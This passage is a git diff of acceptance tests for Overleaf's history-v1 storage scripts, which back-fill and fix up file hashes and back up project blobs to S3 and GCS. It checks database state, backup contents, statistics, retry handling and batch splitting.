{Promise<{result, stats: any}>} + */ + async function runScript(args = [], env = {}, shouldHaveWritten = true) { + const { stats, result } = await tryRunScript(args, env, shouldHaveWritten) + if (result.status !== 0) { + console.log(result) + expect(result).to.have.property('status', 0) + } + return { stats, result } + } + + /** + * @param {boolean} processHashedFiles + */ + function commonAssertions(processHashedFiles = false) { + const writtenBlobs = potentiallyWrittenBlobs.filter(({ hasHash }) => { + if (processHashedFiles) return true // all files processed + return !hasHash // only files without hash processed + }) + it('should update mongo', async function () { + expect(await projectsCollection.find({}).toArray()) + .excludingEvery([ + 'currentEndTimestamp', + 'currentEndVersion', + 'updatedAt', + 'backup', + ]) + .to.deep.equal([ + { + _id: projectId0, + rootFolder: [ + { + fileRefs: [ + { _id: fileId8, hash: gitBlobHash(fileId8) }, + { _id: fileId0, hash: gitBlobHash(fileId0) }, + { _id: fileId6, hash: gitBlobHash(fileId6) }, + { _id: fileId7, hash: hashFile7 }, + ], + folders: [{ fileRefs: [], folders: [] }], + }, + ], + overleaf: { history: { id: historyId0 } }, + }, + { + _id: projectId1, + rootFolder: [ + { + fileRefs: [{ _id: fileId1, hash: gitBlobHash(fileId1) }], + folders: [ + { + fileRefs: [], + folders: [ + { + fileRefs: [ + { _id: fileId1, hash: gitBlobHash(fileId1) }, + ], + folders: [], + }, + ], + }, + ], + }, + ], + overleaf: { history: { id: historyId1 } }, + }, + { + _id: projectId2, + rootFolder: [ + { + fileRefs: [], + folders: [ + { + fileRefs: [], + folders: [ + { + fileRefs: [ + { _id: fileId2, hash: gitBlobHash(fileId2) }, + ], + folders: [], + }, + ], + }, + ], + }, + ], + overleaf: { history: { id: historyId2 } }, + }, + { + _id: projectId3, + rootFolder: [ + { + fileRefs: [], + folders: [ + { + fileRefs: [], + folders: [ + { + fileRefs: [ + { _id: fileId3, hash: gitBlobHash(fileId3) }, + ], + folders: [], + }, + ], + }, + ], + }, + ], + overleaf: { history: { id: historyId3 } }, + }, + { + _id: projectIdNoHistory, + rootFolder: [{ fileRefs: [], folders: [] }], + overleaf: { history: { conversionFailed: true } }, + }, + { + _id: projectIdNoOverleaf, + rootFolder: [{ fileRefs: [], folders: [] }], + }, + { + _id: projectIdBadFileTree0, + overleaf: { history: { id: historyIdBadFileTree0 } }, + }, + { + _id: projectIdBadFileTree1, + rootFolder: [], + overleaf: { history: { id: historyIdBadFileTree1 } }, + }, + { + _id: projectIdBadFileTree2, + rootFolder: [{ fileRefs: [{ _id: null }] }], + overleaf: { history: { id: historyIdBadFileTree2 } }, + }, + { + _id: projectIdBadFileTree3, + rootFolder: [ + { + folders: [null, { folders: {}, fileRefs: 13 }], + fileRefs: [{ _id: fileId9, hash: gitBlobHash(fileId9) }], + }, + ], + overleaf: { history: { id: historyIdBadFileTree3 } }, + }, + ]) + expect(await deletedProjectsCollection.find({}).toArray()).to.deep.equal([ + { + _id: deleteProjectsRecordId0, + project: { + _id: projectIdDeleted0, + rootFolder: [ + { + fileRefs: [], + folders: [ + { + fileRefs: [], + folders: [ + { + fileRefs: [ + { _id: fileId4, hash: gitBlobHash(fileId4) }, + ], + folders: [], + }, + ], + }, + ], + }, + ], + overleaf: { history: { id: historyIdDeleted0 } }, + }, + deleterData: { + deletedProjectId: projectIdDeleted0, + }, + }, + { + _id: deleteProjectsRecordId1, + project: { + _id: projectIdDeleted1, + rootFolder: [ + { + fileRefs: [], + folders: [ + { + fileRefs: [], + folders: [ + { + fileRefs: [ + { _id: fileId5, hash: gitBlobHash(fileId5) }, + ], + folders: [], + }, + ], + }, + ], + }, + ], + overleaf: { history: { id: historyIdDeleted1 } }, + }, + deleterData: { + deletedProjectId: projectIdDeleted1, + }, + }, + { + _id: deleteProjectsRecordId2, + project: { + _id: projectIdNoHistoryDeleted, + rootFolder: [{ fileRefs: [], folders: [] }], + overleaf: { history: { conversionFailed: true } }, + }, + deleterData: { + deletedProjectId: projectIdNoHistoryDeleted, + }, + }, + { + _id: deleteProjectsRecordId3, + deleterData: { deletedProjectId: projectIdHardDeleted }, + }, + { + _id: deleteProjectsRecordId4, + project: { + _id: projectIdNoOverleafDeleted, + rootFolder: [{ fileRefs: [], folders: [] }], + }, + deleterData: { + deletedProjectId: projectIdNoOverleafDeleted, + }, + }, + ]) + expect(await deletedFilesCollection.find({}).toArray()).to.deep.equal([ + { + _id: fileIdDeleted1, + projectId: projectId1, + hash: gitBlobHash(fileIdDeleted1), + }, + { + _id: fileIdDeleted2, + projectId: projectIdDeleted0, + hash: gitBlobHash(fileIdDeleted2), + }, + { + _id: fileIdDeleted3, + projectId: projectIdDeleted0, + // uses the same content as fileIdDeleted2 + hash: gitBlobHash(fileIdDeleted2), + }, + { + _id: fileIdDeleted4, + projectId: projectIdDeleted0, + hash: gitBlobHash(fileIdDeleted4), + }, + { + _id: fileIdDeleted5, + projectId: projectId0, + hash: gitBlobHash(fileIdDeleted5), + }, + ]) + expect( + (await backedUpBlobs.find({}, { sort: { _id: 1 } }).toArray()).map( + entry => { + // blobs are pushed unordered into mongo. Sort the list for consistency. + entry.blobs.sort() + return entry + } + ) + ).to.deep.equal([ + { + _id: projectId0, + blobs: [ + binaryForGitBlobHash(gitBlobHash(fileId0)), + binaryForGitBlobHash(hashFile7), + binaryForGitBlobHash(gitBlobHash(fileIdDeleted5)), + binaryForGitBlobHash(hashTextBlob0), + ].sort(), + }, + { + _id: projectId1, + blobs: [ + binaryForGitBlobHash(gitBlobHash(fileId1)), + binaryForGitBlobHash(gitBlobHash(fileIdDeleted1)), + binaryForGitBlobHash(hashTextBlob1), + ].sort(), + }, + { + _id: projectId2, + blobs: [binaryForGitBlobHash(hashTextBlob2)] + .concat( + processHashedFiles + ? [binaryForGitBlobHash(gitBlobHash(fileId2))] + : [] + ) + .sort(), + }, + { + _id: projectIdDeleted0, + blobs: [ + binaryForGitBlobHash(gitBlobHash(fileId4)), + binaryForGitBlobHash(gitBlobHash(fileIdDeleted2)), + ] + .concat( + processHashedFiles + ? [binaryForGitBlobHash(gitBlobHash(fileIdDeleted4))] + : [] + ) + .sort(), + }, + { + _id: projectId3, + blobs: [binaryForGitBlobHash(gitBlobHash(fileId3))].sort(), + }, + ...(processHashedFiles + ? [ + { + _id: projectIdDeleted1, + blobs: [binaryForGitBlobHash(gitBlobHash(fileId5))].sort(), + }, + ] + : []), + { + _id: projectIdBadFileTree0, + blobs: [binaryForGitBlobHash(hashTextBlob3)].sort(), + }, + { + _id: projectIdBadFileTree3, + blobs: [binaryForGitBlobHash(gitBlobHash(fileId9))].sort(), + }, + ]) + }) + it('should have backed up all the files', async function () { + expect(tieringStorageClass).to.exist + const blobs = await listS3Bucket(projectBlobsBucket, tieringStorageClass) + expect(blobs.sort()).to.deep.equal( + writtenBlobs + .map(({ historyId, fileId, hash }) => + makeProjectKey(historyId, hash || gitBlobHash(fileId)) + ) + .sort() + ) + for (let { historyId, fileId, hash, content } of writtenBlobs) { + hash = hash || gitBlobHash(fileId.toString()) + const s = await backupPersistor.getObjectStream( + projectBlobsBucket, + makeProjectKey(historyId, hash), + { autoGunzip: true } + ) + const buf = new WritableBuffer() + await Stream.promises.pipeline(s, buf) + expect(gitBlobHashBuffer(buf.getContents())).to.equal(hash) + if (content) { + expect(buf.getContents()).to.deep.equal(content) + } else { + const id = buf.getContents().toString('utf-8') + expect(id).to.equal(fileId.toString()) + // double check we are not comparing 'undefined' or '[object Object]' above + expect(id).to.match(/^[a-f0-9]{24}$/) + } + } + const deks = await listS3Bucket(deksBucket, 'STANDARD') + expect(deks.sort()).to.deep.equal( + Array.from( + new Set( + writtenBlobs.map( + ({ historyId }) => projectKey.format(historyId) + '/dek' + ) + ) + ).sort() + ) + }) + it('should have written the back filled files to history v1', async function () { + for (const { historyId, hash, fileId, content } of writtenBlobs) { + const blobStore = new BlobStore(historyId.toString()) + if (content) { + const s = await blobStore.getStream(hash) + const buf = new WritableBuffer() + await Stream.promises.pipeline(s, buf) + expect(buf.getContents()).to.deep.equal(content) + continue + } + const id = await blobStore.getString( + hash || gitBlobHash(fileId.toString()) + ) + expect(id).to.equal(fileId.toString()) + // double check we are not comparing 'undefined' or '[object Object]' above + expect(id).to.match(/^[a-f0-9]{24}$/) + } + }) + // Technically, we should move the below test into its own environment to ensure it does not impact any assertions. + // Practically, this is slow and moving it to the end of the tests gets us there most of the way. + it('should process nothing on re-run', async function () { + const rerun = await runScript( + processHashedFiles ? ['--processHashedFiles=true'] : [], + {}, + false + ) + let stats = { + ...STATS_ALL_ZERO, + // We still need to iterate over all the projects and blobs. + projects: 10, + blobs: 13, + backedUpBlobs: 13, + badFileTrees: 4, + } + if (processHashedFiles) { + stats = sumStats(stats, { + ...STATS_ALL_ZERO, + blobs: 3, + backedUpBlobs: 3, + }) + } + expect(rerun.stats).deep.equal(stats) + }) + } + + function expectNotFoundError(result, msg) { + expect(result.stdout).to.include(msg) + const log = JSON.parse( + result.stdout.split('\n').find(l => l.includes(`"${msg}"`)) + ) + expect(log).to.contain({ + projectId: projectId0.toString(), + fileId: fileId0.toString(), + path: 'rootFolder.0.fileRefs.1', + msg, + }) + expect(log.err).to.contain({ + name: 'NotFoundError', + }) + } + + const STATS_ALL_ZERO = { + projects: 0, + blobs: 0, + backedUpBlobs: 0, + filesWithHash: 0, + filesWithoutHash: 0, + filesDuplicated: 0, + filesRetries: 0, + filesFailed: 0, + globalBlobsCount: 0, + globalBlobsEgress: 0, + fileTreeUpdated: 0, + projectDeleted: 0, + projectHardDeleted: 0, + fileHardDeleted: 0, + badFileTrees: 0, + mongoUpdates: 0, + deduplicatedWriteToAWSLocalCount: 0, + deduplicatedWriteToAWSLocalEgress: 0, + deduplicatedWriteToAWSRemoteCount: 0, + deduplicatedWriteToAWSRemoteEgress: 0, + readFromGCSCount: 0, + readFromGCSIngress: 0, + writeToAWSCount: 0, + writeToAWSEgress: 0, + writeToGCSCount: 0, + writeToGCSEgress: 0, + } + const STATS_UP_TO_PROJECT1 = { + projects: 2, + blobs: 2, + backedUpBlobs: 0, + filesWithHash: 0, + filesWithoutHash: 7, + filesDuplicated: 1, + filesRetries: 0, + filesFailed: 0, + globalBlobsCount: 1, + globalBlobsEgress: 30, + fileTreeUpdated: 0, + projectDeleted: 0, + projectHardDeleted: 0, + fileHardDeleted: 0, + badFileTrees: 0, + mongoUpdates: 6, + deduplicatedWriteToAWSLocalCount: 0, + deduplicatedWriteToAWSLocalEgress: 0, + deduplicatedWriteToAWSRemoteCount: 0, + deduplicatedWriteToAWSRemoteEgress: 0, + readFromGCSCount: 8, + readFromGCSIngress: 4000134, + writeToAWSCount: 7, + writeToAWSEgress: 4086, + writeToGCSCount: 5, + writeToGCSEgress: 4000096, + } + const STATS_UP_FROM_PROJECT1_ONWARD = { + projects: 8, + blobs: 2, + backedUpBlobs: 0, + filesWithHash: 0, + filesWithoutHash: 5, + filesDuplicated: 0, + filesRetries: 0, + filesFailed: 0, + globalBlobsCount: 0, + globalBlobsEgress: 0, + fileTreeUpdated: 0, + projectDeleted: 0, + projectHardDeleted: 0, + fileHardDeleted: 0, + badFileTrees: 4, + mongoUpdates: 10, + deduplicatedWriteToAWSLocalCount: 1, + deduplicatedWriteToAWSLocalEgress: 30, + deduplicatedWriteToAWSRemoteCount: 0, + deduplicatedWriteToAWSRemoteEgress: 0, + readFromGCSCount: 7, + readFromGCSIngress: 134, + writeToAWSCount: 6, + writeToAWSEgress: 173, + writeToGCSCount: 4, + writeToGCSEgress: 96, + } + const STATS_FILES_HASHED_EXTRA = { + ...STATS_ALL_ZERO, + filesWithHash: 3, + mongoUpdates: 1, + readFromGCSCount: 3, + readFromGCSIngress: 72, + writeToAWSCount: 3, + writeToAWSEgress: 89, + writeToGCSCount: 3, + writeToGCSEgress: 72, + } + + function sumStats(a, b) { + return Object.fromEntries(Object.entries(a).map(([k, v]) => [k, v + b[k]])) + } + + const STATS_ALL = sumStats( + STATS_UP_TO_PROJECT1, + STATS_UP_FROM_PROJECT1_ONWARD + ) + + describe('error cases', () => { + beforeEach('prepare environment', prepareEnvironment) + + it('should gracefully handle fatal errors', async function () { + await FILESTORE_PERSISTOR.deleteObject( + USER_FILES_BUCKET_NAME, + `${projectId0}/${fileId0}` + ) + const t0 = Date.now() + const { stats, result } = await tryRunScript([], { + RETRIES: '10', + RETRY_DELAY_MS: '1000', + }) + const t1 = Date.now() + expectNotFoundError(result, 'failed to process file') + expect(result.status).to.equal(1) + expect(stats).to.deep.equal( + sumStats(STATS_ALL, { + ...STATS_ALL_ZERO, + filesFailed: 1, + readFromGCSIngress: -24, + writeToAWSCount: -1, + writeToAWSEgress: -28, + writeToGCSCount: -1, + writeToGCSEgress: -24, + }) + ) + // should not retry 404 + expect(result.stdout).to.not.include( + 'failed to process file, trying again' + ) + expect(t1 - t0).to.be.below(10_000) + }) + + it('should retry on error', async function () { + await FILESTORE_PERSISTOR.deleteObject( + USER_FILES_BUCKET_NAME, + `${projectId0}/${fileId0}` + ) + const restoreFileAfter5s = async () => { + await setTimeout(5_000) + await FILESTORE_PERSISTOR.sendStream( + USER_FILES_BUCKET_NAME, + `${projectId0}/${fileId0}`, + Stream.Readable.from([fileId0.toString()]) + ) + } + // use Promise.allSettled to ensure the above sendStream call finishes before this test completes + const [ + { + value: { stats, result }, + }, + ] = await Promise.allSettled([ + tryRunScript([], { + RETRY_DELAY_MS: '100', + RETRIES: '60', + RETRY_FILESTORE_404: 'true', // 404s are the easiest to simulate in tests + }), + restoreFileAfter5s(), + ]) + expectNotFoundError(result, 'failed to process file, trying again') + expect(result.status).to.equal(0) + expect({ ...stats, filesRetries: 0, readFromGCSCount: 0 }).to.deep.equal({ + ...STATS_ALL, + filesRetries: 0, + readFromGCSCount: 0, + }) + expect(stats.filesRetries).to.be.greaterThan(0, 'should have retried') + expect(stats.readFromGCSCount).to.be.greaterThan( + STATS_ALL.readFromGCSCount, + 'should have read more times from GCS compared to normal operations' + ) + }) + }) + + describe('full run CONCURRENCY=1', function () { + let output + before('prepare environment', prepareEnvironment) + before('run script', async function () { + output = await runScript([], { + CONCURRENCY: '1', + }) + }) + + /** + * @param {ObjectId} projectId + * @param {string} msg + * @param {string} path + */ + function expectBadFileTreeMessage(projectId, msg, path) { + const line = output.result.stdout + .split('\n') + .find(l => l.includes(msg) && l.includes(projectId.toString())) + expect(line).to.exist + expect(JSON.parse(line)).to.include({ + projectId: projectId.toString(), + msg, + path, + }) + } + + it('should print stats', function () { + expect(output.stats).deep.equal(STATS_ALL) + }) + it('should have logged the bad file-tree', function () { + expectBadFileTreeMessage( + projectIdBadFileTree0, + 'bad file-tree, bad folder', + 'rootFolder.0' + ) + expectBadFileTreeMessage( + projectIdBadFileTree1, + 'bad file-tree, bad folder', + 'rootFolder.0' + ) + expectBadFileTreeMessage( + projectIdBadFileTree1, + 'bad file-tree, bad folder', + 'rootFolder.0' + ) + expectBadFileTreeMessage( + projectIdBadFileTree2, + 'bad file-tree, bad fileRef id', + 'rootFolder.0.fileRefs.0' + ) + expectBadFileTreeMessage( + projectIdBadFileTree3, + 'bad file-tree, bad folder', + 'rootFolder.0.folders.0' + ) + expectBadFileTreeMessage( + projectIdBadFileTree3, + 'bad file-tree, bad folders', + 'rootFolder.0.folders.1.folders' + ) + expectBadFileTreeMessage( + projectIdBadFileTree3, + 'bad file-tree, bad fileRefs', + 'rootFolder.0.folders.1.fileRefs' + ) + }) + commonAssertions() + }) + + describe('when processing hashed files later', function () { + let output1, output2 + before('prepare environment', prepareEnvironment) + before('run script without hashed files', async function () { + output1 = await runScript([], {}) + }) + before('run script with hashed files', async function () { + output2 = await runScript(['--processHashedFiles=true'], {}) + }) + it('should print stats', function () { + expect(output1.stats).deep.equal(STATS_ALL) + expect(output2.stats).deep.equal({ + ...STATS_FILES_HASHED_EXTRA, + projects: 10, + blobs: 13, + backedUpBlobs: 13, + badFileTrees: 4, + mongoUpdates: 3, + }) + }) + commonAssertions(true) + }) + + describe('full run CONCURRENCY=10', function () { + let output + before('prepare environment', prepareEnvironment) + before('run script', async function () { + output = await runScript([], { + CONCURRENCY: '10', + }) + }) + it('should print stats', function () { + expect(output.stats).deep.equal(STATS_ALL) + }) + commonAssertions() + }) + + describe('full run STREAM_HIGH_WATER_MARK=1MB', function () { + let output + before('prepare environment', prepareEnvironment) + before('run script', async function () { + output = await runScript([], { + STREAM_HIGH_WATER_MARK: (1024 * 1024).toString(), + }) + }) + it('should print stats', function () { + expect(output.stats).deep.equal(STATS_ALL) + }) + commonAssertions() + }) + + describe('when processing hashed files', function () { + let output + before('prepare environment', prepareEnvironment) + before('run script', async function () { + output = await runScript(['--processHashedFiles=true'], {}) + }) + it('should print stats', function () { + expect(output.stats).deep.equal( + sumStats(STATS_ALL, STATS_FILES_HASHED_EXTRA) + ) + }) + commonAssertions(true) + }) + + describe('with something in the bucket already', function () { + before('prepare environment', prepareEnvironment) + before('create a file in s3', async function () { + const buf = Buffer.from(fileId0.toString()) + await backupPersistor.sendStream( + projectBlobsBucket, + makeProjectKey(historyId0, gitBlobHash(fileId0)), + Stream.Readable.from([buf]), + { contentLength: buf.byteLength } + ) + }) + let output + before('run script', async function () { + output = await runScript([], { + CONCURRENCY: '1', + }) + }) + + it('should print stats', function () { + expect(output.stats).deep.equal( + sumStats(STATS_ALL, { + ...STATS_ALL_ZERO, + // one remote deduplicate + deduplicatedWriteToAWSRemoteCount: 1, + deduplicatedWriteToAWSRemoteEgress: 28, + writeToAWSEgress: -28, // subtract skipped egress + }) + ) + }) + commonAssertions() + }) + + describe('with something in the bucket and marked as processed', function () { + before('prepare environment', prepareEnvironment) + before('create a file in s3', async function () { + await backupPersistor.sendStream( + projectBlobsBucket, + makeProjectKey(historyId0, hashTextBlob0), + Stream.Readable.from([contentTextBlob0]), + { contentLength: contentTextBlob0.byteLength } + ) + await backedUpBlobs.insertMany([ + { + _id: projectId0, + blobs: [binaryForGitBlobHash(hashTextBlob0)], + }, + ]) + }) + let output + before('run script', async function () { + output = await runScript([], { + CONCURRENCY: '1', + }) + }) + + it('should print stats', function () { + expect(output.stats).deep.equal( + sumStats(STATS_ALL, { + ...STATS_ALL_ZERO, + backedUpBlobs: 1, + writeToAWSCount: -1, + writeToAWSEgress: -27, + readFromGCSCount: -1, + readFromGCSIngress: -7, + }) + ) + }) + commonAssertions() + }) + + describe('split run CONCURRENCY=1', function () { + // part0: project0+project1, part1: project2 onwards + const edge = projectId1.toString() + let outputPart0, outputPart1 + before('prepare environment', prepareEnvironment) + before('run script on part 0', async function () { + outputPart0 = await runScript([`--BATCH_RANGE_END=${edge}`], { + CONCURRENCY: '1', + }) + }) + before('run script on part 1', async function () { + outputPart1 = await runScript([`--BATCH_RANGE_START=${edge}`], { + CONCURRENCY: '1', + }) + }) + + it('should print stats', function () { + expect(outputPart0.stats).to.deep.equal(STATS_UP_TO_PROJECT1) + expect(outputPart1.stats).to.deep.equal(STATS_UP_FROM_PROJECT1_ONWARD) + }) + commonAssertions() + }) + + describe('projectIds from file', () => { + const path0 = '/tmp/project-ids-0.txt' + const path1 = '/tmp/project-ids-1.txt' + before('prepare environment', prepareEnvironment) + before('create project-ids.txt files', async function () { + await fs.promises.writeFile( + path0, + [projectId0, projectId1].map(id => id.toString()).join('\n') + ) + await fs.promises.writeFile( + path1, + [ + projectId2, + projectId3, + projectIdDeleted0, + projectIdDeleted1, + projectIdNoHistory, + projectIdNoHistoryDeleted, + projectIdHardDeleted, + projectIdNoOverleaf, + projectIdNoOverleafDeleted, + projectIdBadFileTree0, + projectIdBadFileTree1, + projectIdBadFileTree2, + projectIdBadFileTree3, + ] + .map(id => id.toString()) + .join('\n') + ) + }) + + let outputPart0, outputPart1 + before('run script on part 0', async function () { + outputPart0 = await runScript([`--projectIdsFrom=${path0}`]) + }) + before('run script on part 1', async function () { + outputPart1 = await runScript([`--projectIdsFrom=${path1}`]) + }) + + /** + * @param {string} msg + * @param {ObjectId} projectId + */ + function expectLogEntry(msg, projectId) { + expect(outputPart1.result.stdout).to.include(msg) + const log = JSON.parse( + outputPart1.result.stdout + .split('\n') + .find(l => l.includes(`"${msg}"`) && l.includes(projectId.toString())) + ) + expect(log).to.contain({ + projectId: projectId.toString(), + msg, + }) + } + it('should flag the hard-deleted project', function () { + expectLogEntry('project hard-deleted', projectIdHardDeleted) + }) + it('should flag the projects without history id', function () { + expectLogEntry('project has no history id', projectIdNoOverleaf) + expectLogEntry('project has no history id', projectIdNoOverleafDeleted) + expectLogEntry('project has no history id', projectIdNoHistory) + expectLogEntry('project has no history id', projectIdNoHistoryDeleted) + }) + it('should print stats', function () { + expect(outputPart0.stats).to.deep.equal(STATS_UP_TO_PROJECT1) + expect(outputPart1.stats).to.deep.equal(STATS_UP_FROM_PROJECT1_ONWARD) + }) + commonAssertions() + }) +}) diff --git a/services/history-v1/test/acceptance/js/storage/back_fill_file_hash_fix_up.test.mjs b/services/history-v1/test/acceptance/js/storage/back_fill_file_hash_fix_up.test.mjs new file mode 100644 index 0000000..ceafa24 --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/back_fill_file_hash_fix_up.test.mjs @@ -0,0 +1,818 @@ +import fs from 'node:fs' +import Crypto from 'node:crypto' +import Stream from 'node:stream' +import { promisify } from 'node:util' +import { Binary, ObjectId } from 'mongodb' +import { Blob } from 'overleaf-editor-core' +import { backedUpBlobs, blobs, db } from '../../../../storage/lib/mongodb.js' +import cleanup from './support/cleanup.js' +import testProjects from '../api/support/test_projects.js' +import { execFile } from 'node:child_process' +import chai, { expect } from 'chai' +import chaiExclude from 'chai-exclude' +import config from 'config' +import { WritableBuffer } from '@overleaf/stream-utils' +import { + backupPersistor, + projectBlobsBucket, +} from '../../../../storage/lib/backupPersistor.mjs' +import projectKey from '../../../../storage/lib/project_key.js' +import { + BlobStore, + makeProjectKey, +} from '../../../../storage/lib/blob_store/index.js' +import ObjectPersistor from '@overleaf/object-persistor' + +chai.use(chaiExclude) + +const TIMEOUT = 20 * 1_000 + +const { deksBucket } = config.get('backupStore') +const { tieringStorageClass } = config.get('backupPersistor') + +const projectsCollection = db.collection('projects') +const deletedProjectsCollection = db.collection('deletedProjects') + +const FILESTORE_PERSISTOR = ObjectPersistor({ + backend: 'gcs', + gcs: { + endpoint: { + apiEndpoint: process.env.GCS_API_ENDPOINT, + projectId: process.env.GCS_PROJECT_ID, + }, + }, +}) + +/** + * @param {ObjectId} objectId + * @return {string} + */ +function gitBlobHash(objectId) { + return gitBlobHashBuffer(Buffer.from(objectId.toString())) +} + +/** + * @param {Buffer} buf + * @return {string} + */ +function gitBlobHashBuffer(buf) { + const sha = Crypto.createHash('sha1') + sha.update(`blob ${buf.byteLength}\x00`) + sha.update(buf) + return sha.digest('hex') +} + +/** + * @param {string} gitBlobHash + * @return {Binary} + */ +function binaryForGitBlobHash(gitBlobHash) { + return new Binary(Buffer.from(gitBlobHash, 'hex')) +} + +async function listS3Bucket(bucket, wantStorageClass) { + const client = backupPersistor._getClientForBucket(bucket) + const response = await client.listObjectsV2({ Bucket: bucket }).promise() + + for (const object of response.Contents || []) { + expect(object).to.have.property('StorageClass', wantStorageClass) + } + + return (response.Contents || []).map(item => item.Key || '') +} + +function objectIdFromTime(timestamp) { + return ObjectId.createFromTime(new Date(timestamp).getTime() / 1000) +} + +const PRINT_IDS_AND_HASHES_FOR_DEBUGGING = false + +describe('back_fill_file_hash_fix_up script', function () { + this.timeout(TIMEOUT) + const USER_FILES_BUCKET_NAME = 'fake-user-files-gcs' + + const projectId0 = objectIdFromTime('2017-01-01T00:00:00Z') + const projectIdDeleted0 = objectIdFromTime('2017-01-01T00:04:00Z') + const historyId0 = 42 // stored as number is mongo + const historyIdDeleted0 = projectIdDeleted0.toString() + const fileIdWithDifferentHashFound = objectIdFromTime('2017-02-01T00:00:00Z') + const fileIdInGoodState = objectIdFromTime('2017-02-01T00:01:00Z') + const fileIdBlobExistsInGCS0 = objectIdFromTime('2017-02-01T00:02:00Z') + const fileIdWithDifferentHashNotFound0 = objectIdFromTime( + '2017-02-01T00:03:00Z' + ) + const fileIdWithDifferentHashNotFound1 = objectIdFromTime( + '2017-02-01T00:04:00Z' + ) + const fileIdBlobExistsInGCSCorrupted = objectIdFromTime( + '2017-02-01T00:05:00Z' + ) + const fileIdMissing0 = objectIdFromTime('2024-02-01T00:06:00Z') + const fileIdMissing1 = objectIdFromTime('2017-02-01T00:07:00Z') + const fileIdWithDifferentHashRestore = objectIdFromTime( + '2017-02-01T00:08:00Z' + ) + const fileIdBlobExistsInGCS1 = objectIdFromTime('2017-02-01T00:09:00Z') + const fileIdRestoreFromFilestore0 = objectIdFromTime('2017-02-01T00:10:00Z') + const fileIdRestoreFromFilestore1 = objectIdFromTime('2017-02-01T00:11:00Z') + const fileIdMissing2 = objectIdFromTime('2017-02-01T00:12:00Z') + const fileIdHashMissing0 = objectIdFromTime('2017-02-01T00:13:00Z') + const fileIdHashMissing1 = objectIdFromTime('2017-02-01T00:14:00Z') + const contentCorruptedBlob = 'string that produces another hash' + const contentDoesNotExistAsBlob = 'does not exist as blob' + const hashDoesNotExistAsBlob = gitBlobHashBuffer( + Buffer.from(contentDoesNotExistAsBlob) + ) + const deleteProjectsRecordId0 = new ObjectId() + const writtenBlobs = [ + { + projectId: projectId0, + historyId: historyId0, + fileId: fileIdBlobExistsInGCS0, + }, + { + projectId: projectId0, + historyId: historyId0, + fileId: fileIdBlobExistsInGCS1, + }, + { + projectId: projectId0, + historyId: historyId0, + fileId: fileIdWithDifferentHashNotFound0, + }, + { + projectId: projectId0, + historyId: historyId0, + fileId: fileIdRestoreFromFilestore0, + }, + { + projectId: projectId0, + historyId: historyId0, + fileId: fileIdRestoreFromFilestore1, + }, + { + projectId: projectId0, + historyId: historyId0, + fileId: fileIdHashMissing0, + }, + { + projectId: projectId0, + historyId: historyId0, + fileId: fileIdHashMissing1, + }, + { + projectId: projectIdDeleted0, + historyId: historyIdDeleted0, + fileId: fileIdWithDifferentHashNotFound1, + }, + ] + const logs = [ + { + projectId: projectId0, + fileId: fileIdWithDifferentHashFound, + err: { message: 'OError: hash mismatch' }, + hash: gitBlobHash(fileIdMissing0), // does not matter + entry: { + ctx: { historyId: historyId0.toString() }, + hash: gitBlobHash(fileIdInGoodState), + }, + msg: 'failed to process file', + }, + { + projectId: projectId0, + fileId: fileIdWithDifferentHashRestore, + err: { message: 'OError: hash mismatch' }, + hash: hashDoesNotExistAsBlob, + entry: { + ctx: { historyId: historyId0.toString() }, + hash: gitBlobHash(fileIdMissing0), // does not matter + }, + msg: 'failed to process file', + }, + { + projectId: projectId0, + fileId: fileIdWithDifferentHashNotFound0, + err: { message: 'OError: hash mismatch' }, + hash: gitBlobHash(fileIdWithDifferentHashNotFound0), + entry: { + ctx: { historyId: historyId0.toString() }, + hash: hashDoesNotExistAsBlob, + }, + msg: 'failed to process file', + }, + { + projectId: projectId0, + fileId: fileIdRestoreFromFilestore0, + err: { message: 'OError: hash mismatch' }, + hash: gitBlobHash(fileIdRestoreFromFilestore0), + entry: { + ctx: { historyId: historyId0.toString() }, + hash: hashDoesNotExistAsBlob, + }, + msg: 'failed to process file', + }, + { + projectId: projectIdDeleted0, + fileId: fileIdWithDifferentHashNotFound1, + err: { message: 'OError: hash mismatch' }, + hash: gitBlobHash(fileIdWithDifferentHashNotFound1), + entry: { + ctx: { historyId: historyIdDeleted0.toString() }, + hash: hashDoesNotExistAsBlob, + }, + msg: 'failed to process file', + }, + { + projectId: projectId0, + fileId: fileIdMissing0, + bucketName: USER_FILES_BUCKET_NAME, + err: { message: 'NotFoundError' }, + msg: 'failed to process file', + }, + { + projectId: projectId0, + fileId: fileIdMissing2, + bucketName: USER_FILES_BUCKET_NAME, + err: { message: 'NotFoundError' }, + msg: 'failed to process file', + }, + { + projectId: projectId0, + fileId: fileIdBlobExistsInGCS0, + hash: gitBlobHash(fileIdBlobExistsInGCS0), + err: { message: 'storage.objects.delete' }, + msg: 'failed to process file', + }, + { + projectId: projectId0, + fileId: fileIdBlobExistsInGCSCorrupted, + hash: gitBlobHash(fileIdBlobExistsInGCSCorrupted), + err: { message: 'storage.objects.delete' }, + msg: 'failed to process file', + }, + { + projectId: projectId0, + fileId: fileIdBlobExistsInGCS1, + hash: gitBlobHash(fileIdBlobExistsInGCS1), + err: { message: 'storage.objects.delete' }, + msg: 'failed to process file', + }, + { + projectId: projectId0, + fileId: fileIdRestoreFromFilestore1, + err: { message: 'storage.objects.delete' }, + msg: 'failed to process file', + }, + { + projectId: projectIdDeleted0, + fileId: fileIdMissing1, + bucketName: USER_FILES_BUCKET_NAME, + err: { message: 'NotFoundError' }, + msg: 'failed to process file', + }, + { + err: { message: 'spurious error' }, + msg: 'failed to process file, trying again', + }, + { + err: { message: 'some other error' }, + msg: 'failed to process file', + }, + // from find_malformed_filetrees.mjs + { + projectId: projectId0, + _id: fileIdHashMissing0, + reason: 'bad file hash', + msg: 'bad file-tree path', + }, + { + projectId: projectId0, + _id: fileIdHashMissing1, + reason: 'bad file hash', + msg: 'bad file-tree path', + }, + ] + if (PRINT_IDS_AND_HASHES_FOR_DEBUGGING) { + const fileIds = { + fileIdWithDifferentHashFound, + fileIdInGoodState, + fileIdBlobExistsInGCS0, + fileIdBlobExistsInGCS1, + fileIdWithDifferentHashNotFound0, + fileIdWithDifferentHashNotFound1, + fileIdBlobExistsInGCSCorrupted, + fileIdMissing0, + fileIdMissing1, + fileIdMissing2, + fileIdWithDifferentHashRestore, + fileIdRestoreFromFilestore0, + fileIdRestoreFromFilestore1, + fileIdHashMissing0, + fileIdHashMissing1, + } + console.log({ + projectId0, + projectIdDeleted0, + historyId0, + historyIdDeleted0, + ...fileIds, + hashDoesNotExistAsBlob, + }) + for (const [name, v] of Object.entries(fileIds)) { + console.log( + name, 